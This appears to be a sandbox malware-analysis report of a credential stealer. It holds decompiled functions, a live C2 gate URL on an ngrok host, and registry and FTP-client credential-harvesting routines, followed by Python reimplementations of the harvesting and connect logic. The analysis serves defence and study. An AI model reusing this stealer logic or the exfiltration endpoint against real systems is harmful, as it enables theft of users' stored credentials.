                                                                    						_t26 = E00401000(_t44 - 0x14, __ecx, _t49, _t44 - 0x14);
                                                                    					}
                                                                    				}
                                                                    				_t50 =  *(_t44 - 0x14);
                                                                    				if( *(_t44 - 0x14) == 0) {
                                                                    					L23:
                                                                    					E00401021(_t26, _t37, _t40, _t41, _t54,  *(_t44 - 0x14));
                                                                    					return _t37;
                                                                    				}
                                                                    				_t26 = E0040FD22(_t44 - 0x10, _t50,  *(_t44 - 0x14), _t44 - 0x10); // executed
                                                                    				if(_t26 == 1) {
                                                                    					_t43 = "http://63e2e5290bcf.ngrok.io/gate.php";
                                                                    					while( *_t43 != 0) {
                                                                    						_t37 = _t37;
                                                                    						if(_t37 == 0) {
                                                                    							 *(_t44 - 0x1c) = 2;
                                                                    							while(1) {
                                                                    								 *(_t44 - 0x18) = 0;
                                                                    								_t32 = E00403F97(_t43, _t43,  *(_t44 - 0x14), _t44 - 0x18);
                                                                    								_t33 = _t32;
                                                                    								__eflags = _t32;
                                                                    								if(__eflags != 0) {
                                                                    									__eflags =  *(_t44 - 0x18);
                                                                    									if(__eflags != 0) {
                                                                    										_t37 = _t33;
                                                                    										__eflags = _t37;
                                                                    										if(__eflags == 0) {
                                                                    											_t34 = E00401BC0(_t40, _t43,  *(_t44 - 0x18));
                                                                    											_t33 = _t34;
                                                                    											__eflags = _t34;
                                                                    											if(__eflags != 0) {
                                                                    												_t37 = _t33;
                                                                    											}
                                                                    										}
                                                                    									}
                                                                    								}
                                                                    								_t26 = E00401021(_t33, _t37, _t40, _t41, __eflags,  *(_t44 - 0x18));
                                                                    								_t37 = _t37;
                                                                    								__eflags = _t37;
                                                                    								if(_t37 != 0) {
                                                                    									break;
                                                                    								}
                                                                    								__eflags =  *(_t44 - 0x1c);
                                                                    								if( *(_t44 - 0x1c) == 0) {
                                                                    									break;
                                                                    								}
                                                                    								 *(_t44 - 0x1c) =  *(_t44 - 0x1c) - 1;
                                                                    								Sleep(0x1388);
                                                                    							}
                                                                    							while(1) {
                                                                    								__eflags =  *_t43;
                                                                    								if( *_t43 == 0) {
                                                                    									break;
                                                                    								}
                                                                    								_t43 =  &(_t43[1]);
                                                                    								__eflags = _t43;
                                                                    							}
                                                                    							_t43 =  &(_t43[1]);
                                                                    							__eflags = _t43;
                                                                    							continue;
                                                                    						}
                                                                    						break;
                                                                    					}
                                                                    					_t37 = _t37;
                                                                    					_t54 = _t37;
                                                                    					if(_t37 != 0) {
                                                                    						_t26 = E004026DD("Client Hash", _t44 - 0x10, 0x10);
                                                                    					}
                                                                    				}
                                                                    			}

                                                                    APIs
                                                                      • Part of subcall function 00403FFB: WSAStartup.WSOCK32(00000101,?), ref: 00404010
                                                                    • Sleep.KERNEL32(00001388,00000000,00000000,?,00000000), ref: 0040FE34
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                     • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                     • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: SleepStartup
                                                                    • String ID: Client Hash$http://63e2e5290bcf.ngrok.io/gate.php
                                                                    • API String ID: 1372284471-2662672100
                                                                    • Opcode ID: 78a4a6f96dc1a635fbcf011c39bdbaa13436c5c534892032cf82ccab31f3c8ae
                                                                    • Instruction ID: 534881ec054deb94b57e270d36c90eed6f3ef705066acc8506ca45b4f3c416af
                                                                    • Opcode Fuzzy Hash: 78a4a6f96dc1a635fbcf011c39bdbaa13436c5c534892032cf82ccab31f3c8ae
                                                                    • Instruction Fuzzy Hash: B9210171D0024A9ADF31EAE1C9467FF7A74AB40349F10003BE241715E2D7BC4D99DBAA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 90%
                                                                    			E0040A0A2(void* __ebx, void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                    				intOrPtr _v8;
                                                                    				void* __edi;
                                                                    				void* _t8;
                                                                    				char* _t11;
                                                                    				void* _t19;
                                                                    				void* _t20;
                                                                    				char* _t21;
                                                                    				char* _t22;
                                                                    
                                                                    				_t20 = __ecx;
                                                                    				_t19 = __ebx;
                                                                    				_v8 = E004015F0(_a4, 0x2a, 0);
                                                                    				_t8 = E00401EB1(__eflags, 0); // executed
                                                                    				_t9 = _t8;
                                                                    				if(_t8 != 0) {
                                                                    					E00404351(_a4, _t9, "SiteInfo.QFP", 0xbeef0000); // executed
                                                                    					E004018B8(_t9);
                                                                    				}
                                                                    				_t22 =  *0x4147ed; // 0x640b38
                                                                    				_t21 =  *0x4147f1; // 0x645e80
                                                                    				if( *_t21 != 0) {
                                                                    					do {
                                                                     						_t11 = StrStrIA(_t21, "Odin"); // case-insensitive substring match on the current entry of the first list
                                                                    						_t26 = _t11;
                                                                    						if(_t11 != 0) {
                                                                    							E00404351(_a4, E0040242B(_t26, _t22), "SiteInfo.QFP", 0xbeef0000);
                                                                    							E004018B8(_t14);
                                                                    						}
                                                                     						while( *_t22 != 0) { // step _t22 to the NUL that ends its current string
                                                                     							_t22 = _t22 + 1;
                                                                     							__eflags = _t22;
                                                                     						}
                                                                     						_t22 = _t22 + 1; // skip the NUL: next entry of the second list
                                                                     						asm("cld");
                                                                     						_t20 = 0xffffffff;
                                                                     						asm("repne scasb"); // inline strlen that steps _t21 to its next entry
                                                                     						_t28 =  *_t21;
                                                                     					} while ( *_t21 != 0); // an empty string (double NUL) terminates the list
                                                                    				}
                                                                    				return E00401636(_t19, _t20, _t21, _t28, _a4, _v8);
                                                                    			}


                                                                    APIs
                                                                    • StrStrIA.SHLWAPI(00645E80,Odin), ref: 0040A0F4
                                                                      • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                     • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                     • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeLocal
                                                                    • String ID: Odin$SiteInfo.QFP
                                                                    • API String ID: 2826327444-4277389770
                                                                    • Opcode ID: 30f2ad5037439782e851f0c47a1bf2b858e7b138a18d7a7ae1bf3ad4c08d3565
                                                                    • Instruction ID: cb19261180e9835e7d6e10c1a09fddbbd42b6fc3f6f61c88a0af093412c8222d
                                                                    • Opcode Fuzzy Hash: 30f2ad5037439782e851f0c47a1bf2b858e7b138a18d7a7ae1bf3ad4c08d3565
                                                                    • Instruction Fuzzy Hash: E501D670500205BAEB213B258C06FAF7E59DB82314F24413BBD10B51E3E67C8EA192ED
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%
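The loop in E0040A0A2 walks two parallel, double-NUL-terminated string tables (the pointers loaded from 0x4147f1 and 0x4147ed) and, for every entry of the first table that contains "Odin" (StrStrIA, so case-insensitive), reads a SiteInfo.QFP from the matching entry of the second table. The Python below is an added example, not code from this report or from the Pony source, that reproduces that walk over constructed tables. The table contents, the reading of the first table as product names and the second as directories, and the names walk_multi_sz and find_site_info_targets are my assumptions; the report shows only the loop, not what the two tables hold.

```python
# Constructed sample data: two parallel, double-NUL-terminated string lists,
# standing in for the tables the decompiled loop walks (first list = what
# StrStrIA is run on, second list = what is passed along with "SiteInfo.QFP").
# Their real contents are not in the report; these entries are made up.
NAMES_BLOB = b"FlashFXP\x00Odin Secure FTP\x00WinSCP\x00OdinSecureFTPExpert\x00\x00"
PATHS_BLOB = (
    b"%APPDATA%\\FlashFXP\x00%APPDATA%\\Odin\x00"
    b"%APPDATA%\\WinSCP\x00%PROGRAMFILES%\\Odin\x00\x00"
)

TARGET_FILE = "SiteInfo.QFP"   # literal passed to E00404351 by the sample
MARKER = "Odin"                # literal passed to StrStrIA by the sample


def walk_multi_sz(blob: bytes):
    """Yield each string of a double-NUL-terminated list, in order.

    Mirrors the stepping in the decompiled loop: `while(*p) p++; p++;` on
    the second list and `repne scasb` on the first both advance to the NUL
    that ends the current string and then one byte further. An empty
    string (two NULs in a row) terminates the list.
    """
    pos = 0
    while pos < len(blob):
        end = blob.find(b"\x00", pos)
        if end == -1:
            end = len(blob)
        current = blob[pos:end]
        if not current:
            return
        yield current.decode("latin-1")
        pos = end + 1


def find_site_info_targets(names_blob: bytes, paths_blob: bytes):
    """Return the (name, directory, filename) triples the loop would read.

    StrStrIA is case-insensitive, so the match is done on casefolded text.
    The two lists are consumed in lockstep, exactly as the sample advances
    both pointers once per iteration.
    """
    targets = []
    for name, directory in zip(walk_multi_sz(names_blob), walk_multi_sz(paths_blob)):
        if MARKER.casefold() in name.casefold():
            targets.append((name, directory, TARGET_FILE))
    return targets


if __name__ == "__main__":
    for entry in find_site_info_targets(NAMES_BLOB, PATHS_BLOB):
        print(entry)
```

Because both lists are stepped once per iteration, a missing terminator or a mismatch in the number of entries between the two tables would make the sample read the wrong directory for a name; the model above stops at the shorter list instead.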

                                                                    C-Code - Quality: 100%
                                                                    			E004075D2(intOrPtr _a4, void* _a8, char* _a12) {
                                                                    				void* _v8;
                                                                    				int _v12;
                                                                    				int _v16;
                                                                    				char _v2064;
                                                                    				intOrPtr _v2068;
                                                                    				char _v2072;
                                                                    				long _t24;
                                                                    				long _t25;
                                                                    				intOrPtr _t32;
                                                                    
                                                                    				_t24 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                    				_t25 = _t24;
                                                                    				if(_t25 == 0) {
                                                                    					_v12 = 0;
                                                                    					while(1) {
                                                                    						_v16 = 0x7ff;
                                                                     						if(RegEnumValueA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) { // any non-zero status ends the loop, including ERROR_MORE_DATA for a value name longer than the 0x7ff-character buffer
                                                                    							break;
                                                                    						}
                                                                    						_t32 = E00401D71(_a8, _a12,  &_v2064,  &_v2072);
                                                                    						_v2068 = _t32;
                                                                     						if(_t32 != 0 && _v2072 != 0) { // only values whose data was actually read
                                                                     							E00404017(_a4, _v2068, _v2072, 0xbeef0000); // hand the value to the collector with the same 0xbeef0000 tag used in E0040A0A2
                                                                    						}
                                                                    						E004018B8(_v2068);
                                                                    						_v12 = _v12 + 1;
                                                                    					}
                                                                    					return RegCloseKey(_v8);
                                                                    				}
                                                                    				return _t25;
                                                                    			}


                                                                    APIs
                                                                    • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004075E5
                                                                    • RegEnumValueA.ADVAPI32 ref: 00407619
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040767C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                     • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                     • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseEnumOpenValue
                                                                    • String ID:
                                                                    • API String ID: 4012628704-0
                                                                    • Opcode ID: 10ea3502066fe8b52e55fe2e13767115a87fa09241fe0bdf3a2df35634072dad
                                                                    • Instruction ID: 85ca958a1271cad8174414d3164074e3ff60ec8eec34d7e66a6ef738b10b5b92
                                                                    • Opcode Fuzzy Hash: 10ea3502066fe8b52e55fe2e13767115a87fa09241fe0bdf3a2df35634072dad
                                                                    • Instruction Fuzzy Hash: 44113D3180010DBADF119F90CC41FDEBBB9BF04304F1085B6B515B01A0DB796B919F99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 71%
                                                                    			E00403800(void* __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8, short _a12) {
                                                                    				intOrPtr _v16;
                                                                    				short _v18;
                                                                    				char _v20;
                                                                    				void* _t15;
                                                                    				intOrPtr _t16;
                                                                    				char* _t17;
                                                                    				void* _t19;
                                                                    
                                                                    				_t19 = 0;
                                                                     				_push(6); // IPPROTO_TCP
                                                                     				_push(1); // SOCK_STREAM
                                                                     				_push(2); // AF_INET; executed
                                                                     				L00410838(); // import thunk for socket() (socket.WSOCK32 at 0040380F in the APIs below); executed
                                                                    				if(__eax != 0xffffffff) {
                                                                    					_t19 = __eax;
                                                                     					_t15 = E004018E6( &_v20, 0x10); // presumably zeroes the 16-byte sockaddr_in
                                                                     					_v20 = 2; // sin_family = AF_INET
                                                                     					_v18 = _a12; // sin_port, copied in exactly as the caller passed it
                                                                    					if(_a8 == 0) {
                                                                    						if(_a8 != 0 || _a4 != 0) {
                                                                    							_t16 = E004037C6(_t15, _a4); // executed
                                                                    							if(_t16 != 0xffffffff) {
                                                                    								goto L9;
                                                                    							} else {
                                                                    								goto L10;
                                                                    							}
                                                                    						} else {
                                                                    							goto L10;
                                                                    						}
                                                                    					} else {
                                                                    						_t16 = _a8;
                                                                    						L9:
                                                                     						_v16 = _t16; // sin_addr: the caller's _a8, or the address E004037C6 derived from _a4
                                                                     						_push(0x10);
                                                                     						_t17 =  &_v20;
                                                                     						_push(_t17);
                                                                     						_push(_t19); // executed
                                                                     						L0041083E(); // import thunk for connect() (connect.WSOCK32 at 0040386B); executed
                                                                    						if(_t17 == 0xffffffff) {
                                                                    							L10:
                                                                     							_push(_t19);
                                                                     							L00410844(); // import thunk for closesocket() (closesocket.WSOCK32 at 00403876): every failure path closes the socket and the function returns 0
                                                                    							_t19 = 0;
                                                                    						}
                                                                    					}
                                                                    				} else {
                                                                    				}
                                                                    				return _t19;
                                                                    			}

                                                                    APIs
                                                                    • socket.WSOCK32(00000002,00000001,00000006), ref: 0040380F
                                                                    • connect.WSOCK32(00000000,00000002,00000010,00000002,00000001,00000006), ref: 0040386B
                                                                    • closesocket.WSOCK32(00000000,00000000,00000002,00000010,00000002,00000001,00000006), ref: 00403876
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                     • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                     • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: closesocketconnectsocket
                                                                    • String ID:
                                                                    • API String ID: 643388700-0
                                                                    • Opcode ID: 66ed0b44e1bf70d42faca8f8d91c58e31e1fadf103d0eb03bfab5dc24b0d5bd7
                                                                    • Instruction ID: 08d913eedad497c84f2e0313ceade0e14c6413b499fa458ef27ae104aaf27b56
                                                                    • Opcode Fuzzy Hash: 66ed0b44e1bf70d42faca8f8d91c58e31e1fadf103d0eb03bfab5dc24b0d5bd7
                                                                    • Instruction Fuzzy Hash: 39018832904208AADB10BE758C85BEE769CAF00325F10CA7BB524651D1D7BCCB84D61A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%
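E00403800 is the sample's TCP connect helper: socket(AF_INET, SOCK_STREAM, IPPROTO_TCP), a 16-byte sockaddr_in with family 2, the caller's port and either the caller's address (_a8) or one derived from _a4 by E004037C6, then connect; on any failure the socket is closed and 0 is returned. The Python below is an added example, not code from this report or from the Pony source, that mirrors that logic so it can be exercised in a lab, for instance against a local listener standing in for the gate. That E004037C6 wraps gethostbyname, and that the caller passes port and address already in network byte order, are assumptions; the report does not show the caller.

```python
import socket
import struct


def build_sockaddr_in(sin_addr: int, sin_port: int) -> bytes:
    """Lay out the 16-byte sockaddr_in the way E00403800 fills it.

    _v20 = 2 is sin_family (AF_INET), _v18 is sin_port, _v16 is sin_addr and
    the remaining 8 bytes (sin_zero) stay zeroed. Port and address are copied
    in as given, so the caller must already supply them in network byte order
    (assumption: the report does not show the caller).
    """
    return struct.pack("<HHI", 2, sin_port, sin_addr) + b"\x00" * 8


def connect_tcp(hostname, ip, port, timeout=2.0):
    """Model of E00403800.

    socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); use `ip` if the caller gave
    one, otherwise derive the address from `hostname` (E004037C6, assumed
    here to wrap gethostbyname); connect; on any failure closesocket and
    return None, which is the sample's "return 0" path.
    """
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
    except OSError:
        return None
    try:
        target = ip
        if not target:
            if not hostname:
                raise OSError("neither address nor hostname supplied")
            target = socket.gethostbyname(hostname)
        s.settimeout(timeout)
        s.connect((target, port))
        return s
    except OSError:
        s.close()
        return None


def loopback_self_test():
    """Exercise both outcomes on 127.0.0.1 without touching any external network.

    Returns (connected, refused): connecting to a live listener yields a
    socket, and once that listener is gone the same target yields None.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    s = connect_tcp(None, "127.0.0.1", port)
    connected = s is not None
    if s is not None:
        s.close()
    listener.close()
    refused = connect_tcp(None, "127.0.0.1", port) is None
    return connected, refused


if __name__ == "__main__":
    print(build_sockaddr_in(0x0100007F, 0x5000).hex())
    print(loopback_self_test())
```

The address-first, hostname-second precedence matters when re-pointing a sample at a fake gate: if the caller already passes a resolved address, overriding DNS alone will not redirect the connection.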

                                                                    C-Code - Quality: 100%
                                                                    			E0040F3AC(void* __ecx, intOrPtr _a4, void* _a8, char* _a12, intOrPtr _a16) {
                                                                    				void* _v8;
                                                                    				int _v12;
                                                                    				int _v16;
                                                                    				char _v2064;
                                                                    				intOrPtr _v2068;
                                                                    				long _t22;
                                                                    				long _t23;
                                                                    				long _t26;
                                                                    				void* _t35;
                                                                    
                                                                    				_t35 = __ecx;
                                                                    				_t22 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                    				_t23 = _t22;
                                                                    				if(_t23 == 0) {
                                                                    					_v12 = 0;
                                                                    					while(1) {
                                                                    						_v16 = 0x7ff;
                                                                    						_t26 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
                                                                    						_t27 = _t26;
                                                                    						if(_t26 != 0) {
                                                                    							break;
                                                                    						}
                                                                     						_v2068 = E00401E4C(E00401E4C( &_v2064, E00401DF8(_t27, _a12, "\\"),  &_v2064), _t30, _a16); // apparently builds "<_a12>\<subkey>" for the child key
                                                                     						E0040F30D(_t35, _a4, _a8, _v2068); // visit the child key (function not shown in this section)
                                                                     						E004018B8(_v2068); // LocalFree of the built path (E004018B8 wraps LocalFree, see the E0040A0A2 APIs above)
                                                                    						_v12 = _v12 + 1;
                                                                    					}
                                                                    					return RegCloseKey(_v8);
                                                                    				}
                                                                    				return _t23;
                                                                    			}
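E004075D2 (the values of one key) and E0040F3AC (the subkeys of one key, each visited as "<parent>\<child>") are the two halves of the sample's registry harvesting. The Python below is an added example, not code from this report or from the Pony source, that models both over a constructed in-memory registry. FAKE_REGISTRY, the helper names and the assumption that the unseen E0040F30D harvests a child's values and then recurses are mine. The model also shows the consequence of the bare `!= 0` check in both loops: RegEnumValueA returns ERROR_MORE_DATA for a value name longer than the 0x7ff-character buffer, and that ends enumeration of the key, so every value after it is missed.

```python
ERROR_SUCCESS = 0
ERROR_FILE_NOT_FOUND = 2
ERROR_MORE_DATA = 234
ERROR_NO_MORE_ITEMS = 259
MAX_NAME = 0x7FF        # lpcchName both loops pass to RegEnumValueA / RegEnumKeyExA
TAG = 0xBEEF0000        # constant the sample passes with every harvested item

# Constructed stand-in for a registry hive: key path -> {value name: data}.
# Paths use the backslash join the sample builds with E00401DF8 / E00401E4C.
FAKE_REGISTRY = {
    r"Software\FTPClient": {"LastLogin": "alice"},
    r"Software\FTPClient\Sites": {},
    r"Software\FTPClient\Sites\prod": {"Host": "ftp.example.test", "User": "alice", "Pass": "s3cret"},
    r"Software\FTPClient\Sites\backup": {"Host": "10.0.0.5", "User": "", "Pass": "x"},
}


def reg_enum_value(reg, path, index):
    """Model of RegEnumValueA: (status, name, data) for the index-th value."""
    values = list(reg[path].items())
    if index >= len(values):
        return ERROR_NO_MORE_ITEMS, None, None
    name, data = values[index]
    if len(name) > MAX_NAME:
        return ERROR_MORE_DATA, None, None    # name does not fit the 0x7FF buffer
    return ERROR_SUCCESS, name, data


def reg_enum_subkey(reg, path, index):
    """Model of RegEnumKeyExA: direct children of `path`, in stored order."""
    prefix = path + "\\"
    children = [k[len(prefix):] for k in reg
                if k.startswith(prefix) and "\\" not in k[len(prefix):]]
    if index >= len(children):
        return ERROR_NO_MORE_ITEMS, None
    return ERROR_SUCCESS, children[index]


def harvest_values(reg, path, report):
    """Model of E004075D2: enumerate the values of one key, report non-empty ones.

    Any non-zero RegEnumValueA status ends the loop, ERROR_MORE_DATA included,
    so an over-long value name hides everything enumerated after it.
    """
    if path not in reg:
        return ERROR_FILE_NOT_FOUND      # RegOpenKeyA failed: status returned unchanged
    index = 0
    while True:
        status, name, data = reg_enum_value(reg, path, index)
        if status != ERROR_SUCCESS:
            break
        if name and data:                # the sample checks both results before E00404017
            report.append((path, name, data, TAG))
        index += 1
    return ERROR_SUCCESS


def walk_subkeys(reg, path, report):
    """Model of E0040F3AC: for each subkey build "path\\sub" and visit it.

    E0040F30D is not shown in the report; this assumes it harvests the
    child's values and then recurses into the child's own subkeys.
    """
    if path not in reg:
        return ERROR_FILE_NOT_FOUND
    index = 0
    while True:
        status, sub = reg_enum_subkey(reg, path, index)
        if status != ERROR_SUCCESS:
            break
        child = path + "\\" + sub
        harvest_values(reg, child, report)
        walk_subkeys(reg, child, report)
        index += 1
    return ERROR_SUCCESS


if __name__ == "__main__":
    collected = []
    walk_subkeys(FAKE_REGISTRY, r"Software\FTPClient", collected)
    for item in collected:
        print(item)
```

Note that the walk starts at the subkeys, so values stored directly on the key handed to E0040F3AC are only collected if the caller also runs E004075D2 on that key itself.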

                                                                    APIs
                                                                    • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F3BF
                                                                    • RegEnumKeyExA.ADVAPI32 ref: 0040F3F3
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F44D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseEnumOpen
                                                                    • String ID:
                                                                    • API String ID: 1332880857-0
                                                                    • Opcode ID: f59b2ffa348ce8f7d525ad48ce5023c37a9f7864b087909e0c1e877aeb0058bd
                                                                    • Instruction ID: 25757aefe436132530bd79105f2911b35f687820d7f807c11c3c7734766150bd
                                                                    • Opcode Fuzzy Hash: f59b2ffa348ce8f7d525ad48ce5023c37a9f7864b087909e0c1e877aeb0058bd
                                                                    • Instruction Fuzzy Hash: 5D112A3590010DBADF11AF91CC42FDE7BB9BF00704F1080B6B914B51E1DBB9AA94AF99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0040F30D(void* __ecx, intOrPtr _a4, void* _a8, char* _a12) {
                                                                    				void* _v8;
                                                                    				int _v12;
                                                                    				int _v16;
                                                                    				char _v2064;
                                                                    				intOrPtr _v2068;
                                                                    				long _t21;
                                                                    				long _t22;
                                                                    				long _t25;
                                                                    				void* _t33;
                                                                    
                                                                    				_t33 = __ecx;
                                                                    				_t21 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                    				_t22 = _t21;
                                                                    				if(_t22 == 0) {
                                                                    					_v12 = 0;
                                                                    					while(1) {
                                                                    						_v16 = 0x7ff;
                                                                    						_t25 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
                                                                    						_t26 = _t25;
                                                                    						if(_t25 != 0) {
                                                                    							break;
                                                                    						}
                                                                    						_v2068 = E00401E4C( &_v2064, E00401DF8(_t26, _a12, "\\"),  &_v2064);
                                                                    						E0040F178(_t33, _a4, _a8, _v2068, 0);
                                                                    						E004018B8(_v2068);
                                                                    						_v12 = _v12 + 1;
                                                                    					}
                                                                    					return RegCloseKey(_v8);
                                                                    				}
                                                                    				return _t22;
                                                                    			}












                                                                    Instruction addresses (one per decompiled line): 0x0040f30d 0x0040f320 0x0040f325 0x0040f327 0x0040f329 0x0040f330 0x0040f330 0x0040f350 0x0040f355 0x0040f357 0x00000000 0x00000000 0x0040f377 0x0040f38b 0x0040f396 0x0040f39b 0x0040f39b 0x00000000 0x0040f3a3 0x0040f3a9

                                                                    APIs
                                                                    • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F320
                                                                    • RegEnumKeyExA.ADVAPI32 ref: 0040F350
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F3A3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseEnumOpen
                                                                    • String ID:
                                                                    • API String ID: 1332880857-0
                                                                    • Opcode ID: aa58425948128efde0c861dc7b0a2f434e841ffe9590bdedd6073662ee1f3d27
                                                                    • Instruction ID: 45928e3938db904d05e16263eed0eecc5d6e07d10bcb7dd287d335a9eaebcbfe
                                                                    • Opcode Fuzzy Hash: aa58425948128efde0c861dc7b0a2f434e841ffe9590bdedd6073662ee1f3d27
                                                                    • Instruction Fuzzy Hash: C6113C31900108BADF11AF91CC02FEE7BB9BF00704F1081B6B914B51E1DBB96A94AF98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0040CB74(void* __ebx, void* __ecx, void* __edi, intOrPtr _a4) {
                                                                    				intOrPtr _v8;
                                                                    				char* _v12;
                                                                    				char* _t11;
                                                                    				char* _t12;
                                                                    				char* _t14;
                                                                    				void* _t20;
                                                                    				void* _t21;
                                                                    				void* _t22;
                                                                    
                                                                    				_t22 = __edi;
                                                                    				_t21 = __ecx;
                                                                    				_t20 = __ebx;
                                                                    				_v8 = E004015F0(_a4, 0x43, 0);
                                                                    				_t11 = E00401D71(0x80000002, "SOFTWARE\\Classes\\TypeLib\\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\\1.2\\0\\win32", 0, 0); // executed
                                                                    				_t12 = _t11;
                                                                    				if(_t12 != 0) {
                                                                    					_v12 = _t12;
                                                                    					_t14 = StrStrIA(_v12, "EasyFTP");
                                                                    					_t24 = _t14;
                                                                    					if(_t14 != 0) {
                                                                    						E004041A6(_t21, _a4, E0040242B(_t24, _v12), 0, 0xbeef0000, E0040CB28);
                                                                    						E004018B8(_t17);
                                                                    					}
                                                                    					E004018B8(_v12);
                                                                    				}
                                                                    				return E00401636(_t20, _t21, _t22, _t24, _a4, _v8);
                                                                    			}











                                                                    Instruction addresses (one per decompiled line): 0x0040cb74 0x0040cb74 0x0040cb74 0x0040cb86 0x0040cb97 0x0040cb9c 0x0040cb9e 0x0040cba0 0x0040cbab 0x0040cbb0 0x0040cbb2 0x0040cbcd 0x0040cbd2 0x0040cbd2 0x0040cbda 0x0040cbda 0x0040cbeb

                                                                    APIs
                                                                    • StrStrIA.SHLWAPI(?,EasyFTP), ref: 0040CBAB
                                                                      • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                                      • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                                      • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                                      • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                                      • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                                    Strings
                                                                    • SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32, xrefs: 0040CB8D
                                                                    • EasyFTP, xrefs: 0040CBA3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen$FreeLocal
                                                                    • String ID: EasyFTP$SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
